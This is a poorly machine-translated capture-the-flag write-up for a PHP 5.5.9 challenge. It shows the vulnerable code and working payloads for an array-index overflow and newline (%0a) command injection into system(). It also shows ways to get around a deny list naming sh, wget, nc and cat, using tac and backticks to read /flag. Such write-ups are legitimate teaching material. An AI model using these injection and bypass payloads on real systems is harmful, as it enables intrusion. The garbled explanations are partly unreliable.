Knowledge point 1 php5.5.9 Version number overflow vulnerability

Knowledge point 2 Code execution bypass techniques

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {、
// Here we use the digital overflow vulnerability ,
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
// Here we use the knowledge points of bypassing 
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

1. Digital overflow vulnerability

Loophole principle

namely , When Array Nine digits 16 Number of hours , It will overflow , Equivalent to reordering ,16 Of 8 The power is 4294967296 Logically equivalent to subscript 0;

16 The octave of = 4294967296;

Problem solving :

step 1

$stuff === $array && $stuff[0] != 'admin'

According to this line of code, our construction parameters are

stuff[4294967296]=admin&stuff[1]=user

step 2

system("echo ".$num);

notice system function , Guess it's a command execution vulnerability , Use the truncation character （%0a, Line feed ） To execute orders

Construction parameters

num=1%0als

payload by

stuff[4294967296]=admin&stuff[1]=user&num=1%0als

Put the parameters in hackbar perform （ Because the parameter is post Requested ） And through bp Intercept post Request package

be aware %0D%0A, This is windows System truncation character , Replace it with %0a Then you can execute the command  

（ there a Case insensitive ）

  Successfully find the vulnerability

step 2 

The next step is to bypass

!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)
// These characters are filtered 
sh,wget,nc,python,php,perl,?,flag,},cat,echo,*,^,],\,',",|

frequently-used , Such as ls Not filtered

that + Because this character is url It's encoded , So the blank space has to be used + Number to replace

solve cat banned

because cat By ban 了 , So we use tac,tac The order is the opposite cat command .

cat The command is output from the first line to the last line ,tac Is the output from the last line to the first line

  solve flag banned

Try fla*, Find out * It's also banned

The problem is how to give tac Pass on /flag Parameters

The way 1, Official explanation

By writing to a file /flag route , Then get through this file /flag

One after another to zer0b File is written to /fla,g form /flag, Re pass tac Command acquisition zer0b The content of , Can get /flag

 `, This symbol （ On the keyboard tab Above key ） stay linux Is equivalent to the priority Authority

tac `tac /tmp/zer0b`  This command execution process 

 First, execute  `` The content in is  tac /tmp/zer0b  The execution result is  /flag

 Secondly, execute the whole statement, that is  tac /flag
 Succeed in getting flag